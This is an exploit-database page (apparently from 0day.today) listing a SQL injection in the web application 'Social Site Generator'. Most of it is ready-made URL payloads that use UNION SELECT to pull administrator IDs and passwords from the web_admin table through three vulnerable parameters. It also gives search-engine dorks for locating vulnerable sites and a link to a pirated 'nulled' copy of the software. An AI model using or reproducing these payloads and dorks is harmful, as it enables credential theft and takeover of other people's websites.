[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Social Site Generator (sgc_id) Remote SQL Injection Vulnerability

Author
DeAr Ev!L
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3089
Category
web applications
Date add
30-05-2008
Platform
unsorted
=================================================================
Social Site Generator (sgc_id) Remote SQL Injection Vulnerability
=================================================================



< -------------------\__________________/------------------- >

#
#
# Application Name        : Social Site Generator
#
# DeMo                        : www.ssgdemo.com
#
#Download                   : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type         : SQL InJeCtiOn
#
# Dork 1                       : display_blog.php
# Dork 2                       : social_my_profile_download
# Dork 3                       : social_forum_subcategories
#
# author                       : DeAr Ev!L
#
#
# Greatz                      : ALLAH
#                                : Genie & Roy5 & Mister-x
#                        
# Team                       : DeLtA MoRoCcAn tEaM
#
#Site Web                   : WwW.BHJA.NeT
#
< -------------------^_________________^------------------- >



< -- bug SQL start -- >

ADMIN :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,admin_id+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+admin_id,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,admin_id+from+web_admin

Password :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,password+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+password,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,password+from+web_admin

< -- bug SQL End -- >



#  0day.today [2024-12-26]  #